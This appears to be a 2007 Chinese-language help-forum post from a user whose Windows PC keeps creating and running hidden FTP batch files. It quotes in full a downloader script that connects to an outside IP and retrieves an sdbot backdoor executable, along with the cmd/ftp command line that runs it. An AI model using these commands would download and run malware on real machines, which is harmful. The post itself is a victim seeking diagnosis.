cnnc - 2007-5-16 22:21:00
以下是转贴,我遇到的问题与其描述的相同
请问这是不是windows的漏洞造成的?
---------------------------------------
我的电脑总是时不时的下载文件i(Trojan-downloader.bat.ftp.ab),用记事本打开里面是:
open 60.179.2.229 28152
user 1 1
get setup_72278.exe
quit
再莫名其妙的启动cmd.exe<<o 60.179.2.229 28152<<
和ftp.exe -n -i利用这个文件i(启动参数好象是这样,ip每天在变)
接着就开始下载setup_72278.exe(后面数字在变)
但每次偷偷的下载完要运行的时候就被Kaspersky杀了(backdoor.win32.sdbot.aad)
有时下载的文件o(Trojan-downloader.bat.ftp.ab)
里面内容差不多
也是用ftp.exe和cmd.exe下载winlogn.exe
我用了几乎所有可以杀的杀毒软件,专杀工具,木马工具查杀,查不到,在安全模式下也用了
问题1:我想知道既然没有中木马,为什么会自己下载i,o两个无后缀名的文件
接着启动cmd.exe和ftp.exe(我用icesword发现启动cmd.exe是pid:460 c:\winnt\system32\svchost -k rpcss的进程)(调用函数映象名 svchost pid:460 目标函数映象名 cmd.exe接着再用cme.exe启动ftp.exe进行下载)
问题2:我发现自动获取木马文件的IP,本例中是60.179.2.229 28152 竟然和我本机IP60.179.124.123很相似,应该是在同一个地方,实在是百思不得其解
© 2000 - 2026 Rising Corp. Ltd.